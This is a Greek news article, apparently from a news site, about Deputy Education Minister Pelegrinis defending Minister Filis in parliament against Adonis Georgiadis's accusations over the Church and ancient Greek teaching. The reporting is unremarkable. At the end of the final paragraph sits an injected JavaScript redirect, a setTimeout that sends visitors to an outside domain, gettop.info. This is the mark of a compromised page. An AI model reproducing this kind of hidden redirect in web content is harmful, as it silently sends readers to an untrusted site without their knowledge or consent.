Στο πλευρό Φίλη ο Πελεγρίνης: Έχει και το θάρρος της γνώμης του και δεν κρύπτεται

0
6

 

Από το βήμα της Βουλής ο υφυπουργός Παιδείας Θεοδόσης Πελεγρίνης παρείχε πλήρη στήριξη στον υπουργό του Νίκο Φίλη μετά την είθεση που δέχθηκε από τον βουλευτή και αντιπρόεδρο της ΝΔ Άδωνι Γεωργιάδη, τονίζοντας πως «ο κ. Φίλης έχει και το θάρρος της γνώμης του και δεν κρύπτεται».

Ο κ. Γεωργιάδης εξαπέλυσε επίθεση κατά του κ. Φίλη με αφορμή επίκαιρης ερώτησης του για το μάθημα των αρχαίων ελληνικών, κατηγορώντας τον ότι κρύβεται ενώ τον κάλεσε να ανασκευάσει τα όσα είπε για την εκκλησία.

«Είναι ντροπή ο υπουργός Παιδείας που πρέπει να διατηρεί καλές σχέσεις με την εκκλησία να πετάει σε κάθε αφορμή λάσπη εναντίον της, από το σύμπλεγμα κατωτερότητας που έχει βαθιά μέσα του εναντίον της ελλαδικής εκκλησίας. Πρέπει να έρθει να διορθώσει το λάθος του», είπε χαρακτηριστικά ο κ. Γεωργιάδης.

«Ο κ. Φίλης δεν κρύπτεται. Μεταξύ των άλλων θετικών του, έχει το θάρρος της γνώμης του και απαντά. Έχει και όραμα, αλλά και πρακτικά αντιμετωπίζει τα προβλήματα στην εκπαίδευση» απάντησε ο υφυπουργός Παιδείας σημειώνοντας παράλληλα ότι το αντικείμενο της ερώτησης, δεν ήταν η εκκλησία, προσθέτοντας ότι «διαφορετικά, ο κ. Φίλης θα ήταν εδώ να απαντήσει».

Ο κ. Πελεγρίνης διέψευσε επίσης τα όσα υποστήριξε ο κ. Γεωργιάδης περί προσπάθειας κατάργησης της διδασκαλίας των αρχαίων στα σχολεία:«Θέλω να διαβεβαιώσω και εσάς και τον πρόεδρο της Διεθνούς Ομοσπονδίας κλασικών σπουδών ότι κατ? ουδένα τρόπο το υπουργείο Παιδείας αμφισβητεί την αξία των κλασσικών γραμμάτων. Αντίθετα, είναι άκρως σημαντικό για εμάς η προαγωγή των αρχαίων ελληνικών».

Απάντηση και στις αιχμές του βουλευτή της Δημοκρατικής Συμπαράταξης, Βασίλη Κεγκέρογλου, ότι το υπουργείο Παιδείας όχι μόνο δεν έλυσε, αλλά αντίθετα δημιούργησε περισσότερα προβλήματα στην εκπαίδευση, έδωσε ο κ. Πελεγρίνης: «Στο ζήτημα της παιδείας δεν πρέπει να αναλισκόμαστε σε στείρες αντιπαραθέσεις. Οι συζητήσεις που πρέπει να γίνονται από δω και πέρα είναι αν τα μέτρα που έλαβε το υπουργείο Παιδείας είναι στη σωστή κατεύθυνση. Αυτό έχει σημασία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here